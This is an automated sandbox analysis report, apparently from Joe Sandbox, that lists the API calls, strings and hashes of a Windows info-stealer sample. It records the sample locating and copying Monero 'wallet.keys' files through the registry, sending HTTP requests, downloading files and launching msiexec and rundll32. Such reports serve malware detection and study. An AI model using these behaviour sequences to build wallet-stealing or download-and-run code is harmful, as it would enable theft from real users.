                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022A504F
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022A506B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022A507F
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022A50B0
                                  • InternetCloseHandle.WININET(00000000), ref: 022A5114
                                  • InternetCloseHandle.WININET(00000000), ref: 022A512C
                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A4D7C
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • InternetCloseHandle.WININET(00000000), ref: 022A5136
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: x(x
                                  • API String ID: 2402878923-2787161950
                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction ID: a47b0c722214fdde7eeea8fbb16f4cc2098741581323c8e3db1ef5e17a6fdee0
                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                  • Instruction Fuzzy Hash: CE12D072920318ABCB16EBD4DD51FEEB37ABF25340F504199A10662598EF742F88CF61
                                  APIs
                                  • lstrcpy.KERNEL32(?,?), ref: 022B1642
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                    • Part of subcall function 022B94C7: StrStrA.SHLWAPI(?,?), ref: 022B94D3
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B167E
                                    • Part of subcall function 022B94C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 022B94F7
                                    • Part of subcall function 022B94C7: lstrlen.KERNEL32(?), ref: 022B950E
                                    • Part of subcall function 022B94C7: wsprintfA.USER32 ref: 022B952E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B16C6
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B170E
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B1755
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B179D
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B17E5
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B182C
                                  • lstrcpy.KERNEL32(?,00000000), ref: 022B1874
                                    • Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
                                    • Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC
                                  • strtok_s.MSVCRT ref: 022B19B7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                  • String ID: 0'x$x'x
                                  • API String ID: 4276352425-397258310
                                  • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction ID: b269f49e9d4782999fe96444ad589319b87ca465c9d71c016730728f4533bfd0
                                  • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                  • Instruction Fuzzy Hash: 4D71BAB1960218ABCB15EBF0DC88EEE737AAF55340F0449D8E10DA3154EE756B84CF61
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg
                                  • API String ID: 2244384528-3785015651
                                  • Opcode ID: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                  • Opcode Fuzzy Hash: d3f300acffffec73a1ed4a36f821494afe58ad8f25ce0001d5394ca583b39d44
                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                  • Opcode Fuzzy Hash: 7b54bfdaa8c39128a7994bda412f36a02b80ac47492346df98f86680b69bf2b6
                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                  APIs
                                  • memset.MSVCRT ref: 00401327
                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                  • memset.MSVCRT ref: 00401516
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                  • API String ID: 1930502592-218353709
                                  • Opcode ID: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                  • Opcode Fuzzy Hash: 1ffaf8d4d6c2a3481fec365c2b0764f9c655753230e8ae66aea782baa7a8bf5d
                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,00750148), ref: 00406303
                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,007821A8,00000000,00000000,00400100,00000000), ref: 00406385
                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 3532888709-1526165396
                                  • Opcode ID: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                  • Opcode Fuzzy Hash: 8853f5c5da968409b6cbaba164f86e7b859f398aed1122ab08fb9db45a23fc41
                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                  • StrCmpCA.SHLWAPI(?,00750148), ref: 00406147
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID: a+A$a+A
                                  • API String ID: 4287319946-2847607090
                                  • Opcode ID: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                  • Opcode Fuzzy Hash: 653881ee7fdcfb00626dfd15be3c7c07a9e0627dd95ec019f9b1fd5cab93ad4d
                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • memset.MSVCRT ref: 022B0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022B0F01
                                  • lstrlen.KERNEL32(?), ref: 022B0F0E
                                  • memset.MSVCRT ref: 022B0F34
                                  • memset.MSVCRT ref: 022B0F48
                                    • Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
                                    • Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022B9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022B0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022B0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                  • Instruction ID: 991cad3aab106bdd393eae8da1421a0758702f6bc8953681f0476e8fb6f278fc
                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                  • Instruction Fuzzy Hash: B981B4B5920318ABCB25EBE4DD51FED733AAF54344F004199E30A66085EF746B88CF69
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • memset.MSVCRT ref: 022B0E83
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0E9C
                                  • lstrcat.KERNEL32(?,00420D7C), ref: 022B0EAE
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0EC4
                                  • lstrcat.KERNEL32(?,00420D80), ref: 022B0ED6
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B0EEF
                                  • lstrcat.KERNEL32(?,00420D84), ref: 022B0F01
                                  • lstrlen.KERNEL32(?), ref: 022B0F0E
                                  • memset.MSVCRT ref: 022B0F34
                                  • memset.MSVCRT ref: 022B0F48
                                    • Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
                                    • Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022B9927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,022B0DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 022B9948
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 022B0FC1
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 022B0FCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                  • String ID:
                                  • API String ID: 1395395982-0
                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction ID: e70cf728bbfab4b996b050de2debee33486b9d0160da37489bd19e00d442d252
                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                  • Instruction Fuzzy Hash: 0B61D3B5520318ABCB25EBE0CD45FEE733AAF54344F004199E70A66085EF746B88CF69
                                  APIs
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
                                    • Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
                                    • Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 022A6548
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022A656A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022A659C
                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022A65EC
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022A6626
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 022A6638
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 022A6664
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022A66D4
                                  • InternetCloseHandle.WININET(00000000), ref: 022A6756
                                  • InternetCloseHandle.WININET(00000000), ref: 022A6760
                                  • InternetCloseHandle.WININET(00000000), ref: 022A676A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID:
                                  • API String ID: 3074848878-0
                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction ID: a0fec0e057fa24388525de2d5ea9b19d24b07a040891c579075cddb2446f6c7c
                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                  • Instruction Fuzzy Hash: 7D718C75A60318ABDF24DFE4CC58BEEB779EF04700F104099E10AAB598DBB46A84CF51
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 022B92D3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID:
                                  • API String ID: 2244384528-0
                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction ID: 80a3808e8fc944be5c492c3b8a83e31c0133126080240e5db278e92b7942abba
                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                  • Instruction Fuzzy Hash: A771FAB9A50208ABDB14DFE4DD94FEEBBB9EF49300F108108F605A7294DB74A944CF61
                                  APIs
                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                  • memset.MSVCRT ref: 0041716A
                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                  • sA, xrefs: 00417111
                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
